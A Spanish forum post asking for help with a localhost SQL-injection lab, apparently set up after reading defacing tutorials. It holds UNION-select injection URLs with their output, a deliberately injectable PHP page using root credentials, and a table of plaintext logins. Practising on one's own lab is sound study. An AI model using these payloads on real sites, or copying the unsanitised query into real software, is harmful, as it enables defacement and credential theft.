Holas amigos, estaba leyendo unos tutoriales de defacing,al grano...mi problema es que no me sale el nombre de la tabla de mi base de datos.
Tengo una tabla llamada "usuarios_labisql" en una base de datos, en mi localhost pongo el siguiente codigo
"http://localhost/defacing/index.php?id=-1+union+all+select+1,group_concat(table_name),3,4,5+from+information_schema.tables--" , resultado:
"CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,phpbb_acl_groups,phpbb_acl_options,phpbb_acl_roles,phpbb_acl_roles_data,phpbb_acl_users,phpbb_attachment "
En los tutos que lei, segun yo, deberia salir el nombre de mi tabla "usuarios_labisql" tambien probe con este otro codigo:
http://localhost/defacing/index.php?id=-1+union+all+select+1,table_name,3,4,5+from+information_schema.tables+limit+31,1--
Codigo fuente
<?php
$host = "localhost";
$database = "Lab_iSQL";
$username = "root";
$password = "nosedice";
$conexio = mysql_connect($host, $username, $password);
mysql_select_db ($database, $conexio) OR die ("No se puede conectar");
?>
<html>
<head><title>Laboratorio de Inyeccion SQL</title></head>
<body>
<a href="index.php?id=1">Primer registro</a><br>
<?php
$result=mysql_query("SELECT * FROM Usuarios_LabiSQL WHERE id =".
$_GET['id']); //Creacion de la consulta
if (!$result){
echo 'Error SQL Incorrecta';
}else{
$row = mysql_fetch_array($result);
echo '<table border="1"><tr>';
echo '<td align="right"><b>Id</b></td><td>'.
$row[0].'</td></tr>';
echo '<tr><td align="right"><b>Nombre</b></td><td>'.
$row[1].'</td></tr>';
echo '<tr><td align="right"><b>Apellido</b></td><td>'.
$row[2].'</td>';
echo '</tr></table>';
mysql_free_result($result);
}
?>
</body>
</html>
Base de datos
--- Estructura de tabla para la tabla `Usuarios_LabiSQL`
-
CREATE TABLE `usuarios_labisql` (
`id` int(4) unsigned NOT NULL auto_increment,
`nombre` varchar(50) NOT NULL,
`apellido` varchar(50) NOT NULL,
`User` varchar(10) NOT NULL,
`Pass` varchar(10) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=3 ;
-
-- Volcar la base de datos para la tabla `Usuarios_LabiSQL`
-
INSERT INTO `Usuarios_LabiSQL` (`id`, `nombre`, `apellido`, `User`, `Pass`) VALUES
(1, 'Shell', 'Root', 'admin', 'admin'),
(2, 'Rakzo', 'Fimbres', 'Rakzo12', 'Rakzo12');
Este es el tuto que me lei (http://es.scribd.com/doc/23169971/Laboratorio-Inyeccion-SQL)
Tambien lei otros pero siempre llego al mismo punto.
Espero su ayuda. Gracias!